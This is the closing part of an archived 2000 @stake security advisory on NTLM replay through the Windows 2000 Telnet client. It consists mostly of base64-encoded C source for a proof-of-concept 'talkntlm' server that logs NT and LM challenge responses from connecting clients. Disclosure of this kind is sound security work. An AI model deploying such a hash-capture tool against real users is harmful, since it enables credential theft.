ZigiTlQgUmVzcG9uc2U6XG4iKTsKICAgIGZvcihpPTA7aTxudHJlc3BsZW47aSsrKSB7CiAg
ICAgIHByaW50ZigiJTIuMlggIixudHJlc3BbaV0pOwogICAgICBmcHJpbnRmKGxmLCIlMi4y
WCIsbnRyZXNwW2ldKTsKICAgICAgaWYoaSU4PT03KSBwcmludGYoIlxuIik7CiAgICB9CiAg
ICBwcmludGYoIlxuIik7CiAgICBmcHJpbnRmKGxmLCI6Iik7CiAgICBmcmVlKG50cmVzcCk7
CiAgICAKICAgIC8vIEdldCBMTSByZXNwb25zZQogICAgaW50IGxtcmVzcGxlbixsbXJlc3Bv
ZmY7CiAgICB1bnNpZ25lZCBjaGFyICpsbXJlc3A7CiAgICBsbXJlc3BsZW49cmVzcGJ1Zlsw
eDE4XSB8IChyZXNwYnVmWzB4MTldPDw4KTsKICAgIGxtcmVzcG9mZj1yZXNwYnVmWzB4MUNd
IHwgKHJlc3BidWZbMHgxRF08PDgpIHwgCiAgICAgIChyZXNwYnVmWzB4MUVdPDwxNikgfCAo
cmVzcGJ1ZlsweDFGXTw8MjQpOwogICAgbG1yZXNwPSh1bnNpZ25lZCBjaGFyICopbWFsbG9j
KGxtcmVzcGxlbik7CiAgICBpZighbG1yZXNwKSBnb3RvIHRlbG5ldGxvZ2ZhaWw7CiAgICBt
ZW1jcHkobG1yZXNwLCZyZXNwYnVmW2xtcmVzcG9mZis0XSxsbXJlc3BsZW4pOwogICAgcHJp
bnRmKCJMTSBSZXNwb25zZTpcbiIpOwogICAgZm9yKGk9MDtpPGxtcmVzcGxlbjtpKyspIHsK
ICAgICAgcHJpbnRmKCIlMi4yWCAiLGxtcmVzcFtpXSk7CiAgICAgIGZwcmludGYobGYsIiUy
LjJYIixsbXJlc3BbaV0pOwogICAgICBpZihpJTg9PTcpIHByaW50ZigiXG4iKTsKICAgIH0K
ICAgIHByaW50ZigiXG4iKTsKICAgIGZwcmludGYobGYsIlxuIik7CiAgICBmcmVlKGxtcmVz
cCk7ICAKICAgIAogICAgZnJlZShyZXNwYnVmKTsKICAgIAogICAgZmNsb3NlKGxmKTsKICAg
IC8vIENsb3NlIHRoZSB0ZWxuZXQgc2Vzc2lvbgogICAgZmNsb3NlKGdfZkNvbW1Tb2NrKTsK
ICAgIHByaW50ZigiY2xvc2VkIHRlbG5ldCBzb2NrZXQuXG4iKTsKCiAgfQoKICByZXR1cm4g
MDsKICAKIHRlbG5ldGxvZ2ZhaWw6OyAvLyBGYWlsdXJlCiAgCiAgaWYobGYhPU5VTEwpCiAg
ICBmY2xvc2UobGYpOwogIHByaW50ZigidGVsbmV0IG5lZ290aWF0aW9uIGZhaWxlZC5cbiIp
OwogIGZjbG9zZShnX2ZDb21tU29jayk7CiAgCiAgcmV0dXJuIC01Owp9CgoKCnZvaWQgdXNh
Z2UoY2hhciAqcHJvZ25hbWUsaW50IGV4aXRjb2RlKQp7CiAgcHJpbnRmKCJ0YWxrbnRsbSB2
JWQuJWQgKCVzKVxuIixNQUpPUl9WRVJTSU9OLE1JTk9SX1ZFUlNJT04scHJvZ25hbWUpOwog
IHByaW50ZigidXNhZ2U6IHRhbGtudGxtIC10IFstcCA8cG9ydD5dIC1sIDxjaGFsbGVuZ2Ug
cmVzcG9uc2UgbG9nZmlsZT5cbiIscHJvZ25hbWUpOwogIGV4aXQoZXhpdGNvZGUpOwp9CgoK
aW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkKewogIHVuc2lnbmVkIGNoYXIgYjsK
ICBpbnQgaSx0cDsKICAKICAvLyBHZXQgb3B0aW9ucwogIAogIGludCBvcHRfcG9ydD0wOwog
IGNoYXIgKm9wdF9sb2dmaWxlPU5VTEw7CiAgTUVUSE9EIG9wdF9tZXRob2Q9TUVUSE9EX05P
TkU7CiAgU1VCTUVUSE9EIG9wdF9zdWJtZXRob2Q9U1VCTUVUSE9EX05PTkU7CgogIGNoYXIg
b2M7CiAgd2hpbGUoKG9jPWdldG9wdChhcmdjLGFyZ3YsImw6cDp0IikpPjApIHsKICAgIHN3
aXRjaChvYykgewogICAgY2FzZSAndCc6CiAgICAgIG9wdF9tZXRob2Q9TUVUSE9EX1RFTE5F
VDsKICAgICAgaWYob3B0X3BvcnQ9PTApIHsKCW9wdF9wb3J0PTIzOwogICAgICB9CiAgICAg
IGJyZWFrOwogICAgY2FzZSAncCc6CiAgICAgIG9wdF9wb3J0PWF0b2kob3B0YXJnKTsKICAg
ICAgYnJlYWs7CiAgICBjYXNlICdsJzoKICAgICAgb3B0X2xvZ2ZpbGU9b3B0YXJnOwogICAg
ICBpZihvcHRfc3VibWV0aG9kIT1TVUJNRVRIT0RfTk9ORSkKCXVzYWdlKGFyZ3ZbMF0sLTIp
OwogICAgICBvcHRfc3VibWV0aG9kPVNVQk1FVEhPRF9MT0c7CiAgICAgIGJyZWFrOwogICAg
ZGVmYXVsdDoKICAgICAgdXNhZ2UoYXJndlswXSwtMyk7CiAgICAgIAogICAgICBicmVhazsK
ICAgIH0KICB9CiAgCiAgLy8gR28gdG8gdGhlIHBhcnRpY3VsYXIgbWV0aG9kCiAgaWYob3B0
X21ldGhvZD09TUVUSE9EX05PTkUpIHsKICAgIHVzYWdlKGFyZ3ZbMF0sLTQpOwogIH0gCiAg
ZWxzZSBpZihvcHRfbWV0aG9kPT1NRVRIT0RfVEVMTkVUKSB7CiAgICAKICAgIC8vIFRlbG5l
dCBtZXRob2RzCiAgICAKICAgIGlmKG9wdF9zdWJtZXRob2Q9PVNVQk1FVEhPRF9OT05FKSB7
CiAgICAgIHVzYWdlKGFyZ3ZbMF0sLTUpOwogICAgCiAgICB9CiAgICBlbHNlIGlmKG9wdF9z
dWJtZXRob2Q9PVNVQk1FVEhPRF9MT0cpIHsKCiAgICAgIC8vIFRlbG5ldCBoYXNoIGxvZ2dp
bmcKCiAgICAgIGlmKG9wdF9sb2dmaWxlPT1OVUxMKSB7Cgl1c2FnZShhcmd2WzBdLC03KTsK
ICAgICAgfQogICAgICBpZihkb190ZWxuZXRfbG9nKG9wdF9wb3J0LG9wdF9sb2dmaWxlKSE9
MCkKCXJldHVybiAtODsKICAgIAogICAgfQoKICB9CgogIHJldHVybiAwOwp9CgoKCgoKCgoK
CgoKCgoKCgoKCgoKCgoKCgo=
=====================
For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc
Copyright 2000 @stake, Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
iQA/AwUBOcEW2FESXwDtLdMhEQLnygCfXkCf0JtJJ4S4GSI+Mwo8gVR/Tg0AnRBY
Rt6xVIMOB6Xi/VKj/A+bfwNw
=retS
-----END PGP SIGNATURE-----
Current thread:
- @stake Advisory: NTLM Replaying via Windows 2000 Telnet Client (A 091400-1) @stake Advisories (Sep 14)